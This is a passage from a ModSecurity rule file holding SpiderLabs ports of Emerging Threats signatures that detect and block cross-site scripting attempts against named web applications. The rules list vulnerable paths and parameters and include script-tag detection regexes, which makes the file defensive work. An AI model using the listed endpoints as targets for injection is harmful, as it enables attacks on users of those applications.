ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:WEBINDEX/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module blade_leds.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /private/ipmi_bladestatus.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011195,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:SLOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM BladeCenter Management Module ipmi_bladestatus.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004576) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php SecRule REQUEST_LINE "@contains /module_bbcodeloader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004576,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_bbcodeloader.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004577) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php SecRule REQUEST_LINE "@contains /module_div.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004577,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_div.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php SecRule REQUEST_LINE "@contains /module_email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004578,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_email.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004579) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php SecRule REQUEST_LINE "@contains /module_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004579,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_image.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004580) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php SecRule REQUEST_LINE "@contains /module_link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004580,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_link.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid SecRule REQUEST_LINE "@contains /jscripts/folder_rte_files/module_table.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004581,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24244'" SecRule &TX:'/XSS.*ARGS:editorid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Invision Power Board XSS Attempt -- module_table.php editorid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004592) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php SecRule REQUEST_LINE "@contains /calendar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004592,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php',tag:'web-application-attack',tag:'url,www.vbulletin.com/forum/showthread.php?postid=1355012'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin XSS Attempt -- calendar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004572,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login',tag:'web-application-attack',tag:'url,www.osvdb.org/34791'" SecRule &TX:'/XSS.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS XSS Attempt -- index.php login',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003913) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003913,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467832/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:_m/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Kayako eSupport XSS Attempt -- index.php _m',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /profiles/html/simpleSearch.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009990,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securitytracker.com/alerts/2009/Sep/1022945.html'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM Lotus Connections simpleSearch.do Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003918) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php SecRule REQUEST_LINE "@contains /sendmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003918,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23847'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- sendmail.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003919) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- order_form.php SecRule REQUEST_LINE "@contains /order_form.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003919,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- order_form.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23847'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minh Nguyen Duong Obie Website Mini Web Shop XSS Attempt -- order_form.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin SecRule REQUEST_LINE "@contains /configure_plugin.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'" SecRule &TX:'/XSS.*ARGS:edit_plugin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- configure_plugin.tpl.php edit_plugin',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php 1 SecRule REQUEST_LINE "@contains /web/phpinfo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003883,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php 1',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'" SecRule REQUEST_LINE "@contains 1[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a SecRule REQUEST_LINE "@contains /web/phpinfo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003884,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23917'" SecRule REQUEST_LINE "@contains a[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Multi User Randomizer (phpMUR) XSS Attempt -- phpinfo.php a',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/queuedMessage.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011082,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains method=getQueueMessages&" "chain" SecRule &TX:'/XSS.*ARGS:queueMsgType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS McAfee Email Gateway queueMsgType Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011083) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /admin/queuedMessage.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011083,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains method=getQueueMessages&" "chain" SecRule &TX:'/XSS.*ARGS:QtnType/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS McAfee Email Gateway QtnType Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003894) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username SecRule REQUEST_LINE "@contains /de/pda/dev_logon.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003894,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- dev_logon.asp username',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003895) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- registerAccount.asp SecRule REQUEST_LINE "@contains /usrmgr/registerAccount.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003895,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- registerAccount.asp',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- registerAccount.asp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003896) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp SecRule REQUEST_LINE "@contains /de/create_account.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003896,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468048/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nokia Intellisync Mobile Suite XSS Attempt -- create_account.asp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010031) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Novell eDirectory 'dconserv.dlm' Cross-Site Scripting Attempt SecRule REQUEST_LINE "@contains /dhost/modules" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010031,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Novell eDirectory \'dconserv.dlm\' Cross-Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36567/info'" SecRule &TX:'/XSS.*ARGS:dconserv.dlm/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Novell eDirectory \'dconserv.dlm\' Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home SecRule REQUEST_LINE "@contains /skins/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003878,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3838'" SecRule &TX:'/XSS.*ARGS:ote_home/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011268) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /faces/jsf/tips.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011268,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:context/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid SecRule REQUEST_LINE "@contains /settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003879,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23761'" SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid SecRule REQUEST_LINE "@contains /cat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23761'" SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2001218) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2001218,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt',tag:'web-application-attack',tag:'url,www.waraxe.us/?modname=sa&id=030'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004582) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Gallery XSS Attempt -- search.php order SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004582,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Gallery XSS Attempt -- search.php order',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469985/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Gallery XSS Attempt -- search.php order',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003914) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id SecRule REQUEST_LINE "@contains /Default.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003914,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467823/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerEasy ComeUrl Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /user/User_ChkLogin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011117,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PowerEasy ComeUrl Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39696'" SecRule &TX:'/XSS.*ARGS:ComeUrl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerEasy ComeUrl Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009672) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt SecRule REQUEST_LINE "@contains /rating/rate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009672,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/programsrating-xss.txt'" SecRule ARGS_NAMES "(?i:id)" "chain" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains <script>" "chain" SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009673) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt SecRule REQUEST_LINE "@contains /rating/postcomments.php" 